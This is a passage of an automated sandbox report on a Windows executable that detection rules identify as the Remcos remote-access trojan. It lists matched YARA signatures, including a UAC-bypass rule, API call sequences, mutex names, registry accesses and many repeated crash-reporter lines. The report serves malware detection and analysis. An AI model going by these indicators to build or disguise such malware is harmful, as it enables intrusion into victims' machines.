              Source: 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: Process Memory Space: BiU282bjyR.exe PID: 7076, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 840
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004163CA ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004163CA
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004381800_2_00438180
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004333640_2_00433364
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0043730E0_2_0043730E
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0044D3D90_2_0044D3D9
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004274640_2_00427464
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004275CD0_2_004275CD
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041D5800_2_0041D580
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004377430_2_00437743
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0043D85D0_2_0043D85D
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0043587B0_2_0043587B
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0042682C0_2_0042682C
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004369FA0_2_004369FA
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0043DA8C0_2_0043DA8C
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00413AA00_2_00413AA0
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00453B690_2_00453B69
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00437B780_2_00437B78
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041EB180_2_0041EB18
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00445BE00_2_00445BE0
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0043DCBB0_2_0043DCBB
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00452D3B0_2_00452D3B
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00426DBB0_2_00426DBB
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00436EF60_2_00436EF6
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0043DF180_2_0043DF18
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: String function: 0043418E appears 41 times
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: String function: 00402093 appears 50 times
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: String function: 00401E65 appears 32 times
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: String function: 00434800 appears 54 times
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041B5CA OpenProcess,NtResumeProcess,CloseHandle,0_2_0041B5CA
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041B59E OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041B59E
              Source: BiU282bjyR.exe, 00000000.00000000.363460155.0000000000460000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7z.exe* vs BiU282bjyR.exe
              Source: BiU282bjyR.exeBinary or memory string: OriginalFilename7z.exe* vs BiU282bjyR.exe
              Source: BiU282bjyR.exeReversingLabs: Detection: 55%
              Source: C:\Users\user\Desktop\BiU282bjyR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\BiU282bjyR.exe C:\Users\user\Desktop\BiU282bjyR.exe
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 840
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 844
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 888
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 892
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 884
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 844
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1052
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1220
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 912
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1252
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 912
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1416
              Source: C:\Users\user\Desktop\BiU282bjyR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004173E7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_004173E7
              Source: C:\Users\user\Desktop\BiU282bjyR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\json[1].jsonJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB618.tmpJump to behavior
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@13/38@1/2
              Source: C:\Users\user\Desktop\BiU282bjyR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041A4DF OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041A4DF
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040F27D GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040F27D
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7076
              Source: C:\Users\user\Desktop\BiU282bjyR.exeMutant created: \Sessions\1\BaseNamedObjects\EGiy6hf-YWJYTZ
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041AF3D FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041AF3D
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: Software\0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: EGiy6hf-YWJYTZ0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: Exe0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: Exe0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: EGiy6hf-YWJYTZ0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: Inj0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: Inj0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: exepath0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: exepath0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: licence0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: L=G0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: X2}0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: 8CG0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: Administrator0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: User0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: del0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: del0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: del0_2_0040E7CE
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCommand line argument: .mE0_2_00456C80
              Source: C:\Users\user\Desktop\BiU282bjyR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\BiU282bjyR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: BiU282bjyR.exeStatic file information: File size 1232384 > 1048576

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\BiU282bjyR.exeUnpacked PE file: 0.2.BiU282bjyR.exe.400000.0.unpack
              Source: C:\Users\user\Desktop\BiU282bjyR.exeUnpacked PE file: 0.2.BiU282bjyR.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00457438 push eax; ret 0_2_00457456
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0045D53D push esi; ret 0_2_0045D546
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00434846 push ecx; ret 0_2_00434859
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00456B16 push ecx; ret 0_2_00456B29
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041C5E5 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041C5E5
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00406DD7 ShellExecuteW,URLDownloadToFileW,0_2_00406DD7
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041A4DF OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041A4DF

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (91).png
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041C5E5 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041C5E5
              Source: C:\Users\user\Desktop\BiU282bjyR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
